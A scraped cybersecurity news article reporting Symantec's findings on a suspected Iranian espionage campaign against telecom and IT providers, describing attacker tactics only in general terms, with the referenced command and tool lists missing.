Dec 16, 2021
0 0

Telecom operators targeted in recent espionage hacking campaign

Written by

Microsoft December 2021 Patch Tuesday fixes 6 zero-days, 67 flaws
New ransomware now being deployed in Log4Shell attacks
Microsoft fixes Windows AppX Installer zero-day used by Emotet
Log4j vulnerability now used by state-backed hackers, access brokers
Google Calendar now lets you block invitation phishing attempts
Microsoft: Khonsari ransomware hits self-hosted Minecraft servers
Gumtree classifieds site leaked personal info via the F12 key
Lenovo laptops vulnerable to bug allowing admin privileges
Qualys BrowserCheck
Junkware Removal Tool
How to remove the PBlock+ adware browser extension
Remove the Search Redirect
Remove the Search Redirect
Remove the Search Redirect
Remove Security Tool and SecurityTool (Uninstall Guide)
How to remove Antivirus 2009 (Uninstall Instructions)
How to Remove WinFixer / Virtumonde / Msevents / Trojan.vundo
How to remove Google Redirects or the TDSS, TDL3, or Alureon rootkit using TDSSKiller
Locky Ransomware Information, Help Guide, and FAQ
CryptoLocker Ransomware Information Guide and FAQ
CryptorBit and HowDecrypt Information Guide and FAQ
CryptoDefense and How_Decrypt Ransomware Information Guide and FAQ
How to make the Start menu full screen in Windows 10
How to install the Microsoft Visual C++ 2015 Runtime
How to open an elevated PowerShell Admin prompt in Windows 10
How to Translate a Web Page in Google Chrome
How to start Windows in Safe Mode
How to remove a Trojan, Virus, Worm, or other Malware
How to show hidden files in Windows 7
How to see hidden files in Windows
IT Certification Courses
Gear + Gadgets
Researchers have spotted a new espionage hacking campaign targeting telecommunication and IT service providers in the Middle East and Asia.
The campaign has been conducted over the past six months, and there are tentative links to the Iranian-backed actor, MERCURY (aka MuddyWaterSeedWorm, or TEMP.Zagros).
The report comes from the Threat Hunter Team at Symantec, who has collected evidence and toolset samples from recent attacks in Israel, Jordan, Kuwait, Saudi Arabia, the United Arab Emirates, Pakistan, Thailand, and Laos.
The attackers appear to be most interested in vulnerable Exchange Servers, which they use for web shell deployment.
After the initial breach, they steal account credentials and move laterally in the corporate network. In some cases, they use their foothold to pivot to other connected organizations.
Although the infection vector is unknown, Symantec was able to find a case of a ZIP file named “Special discount,” which contained an installer for a remote desktop software application.
As such, the threat actors may be distributing spear-phishing emails to specific targets.
The first sign of compromise by the threat actors is typically the creation of a Windows service to launch a Windows Script File (WSF) that performs reconnaissance on the network.
Next, PowerShell is used to download more WSFs, and Certutil is used to download tunneling tools and run WMI queries.
“Based on process lineage data, attackers seemed to use scripts extensively. These may be automated scripts used for collecting information and downloading additional tools,” explains Symantec’s report.
“However, in one instance, a command asks cURL for help, suggesting that there may have been at least some hands-on-keyboard activity on the part of the attackers.”
Having established their presence on the target organization, the actors use the eHorus remote access tool, which enables them to do the following:
To pivot to other telcos, the actors look for potential Exchange Web Services links and use the following commands for this purpose:
The full list with the toolset used by the particular actor is given below:
Most of these tools are publicly available tools commonly used by offensive security teams, so they may not trigger alarms in organizations.
Even though the attribution isn’t definitive, Symantec logged two IP addresses that overlap with infrastructure used in older MuddyWater attacks.
Moreover, the toolset features several similarities to March 2021 attacks reported by Trend Micro researchers.
Still, many Iranian state-supported actors use off-the-shelf tools and regularly switch infrastructure, and as such, no conclusive attribution can be made at this time.
Hackers hit Iran’s Mahan airline, claim confidential data theft
Microsoft warns of the evolution of six Iranian hacking groups
Iranian state hackers use upgraded malware in attacks on ISPs, telcos
Log4j vulnerability now used by state-backed hackers, access brokers
New ‘Karakurt’ hacking group focuses on data theft and extortion
Not a member yet? Register Now
Log4j: List of vulnerable products and vendor advisories
Hackers steal Microsoft Exchange credentials using IIS module
To receive periodic updates and news from BleepingComputer, please use the form below.
Terms of Use Privacy PolicyEthics Statement
Copyright @ 2003 – 2021 Bleeping Computer® LLC – All Rights Reserved
Not a member yet? Register Now
Read our posting guidelinese to learn what content is prohibited.


Article Categories:
Cybersecurity News

Comments are closed.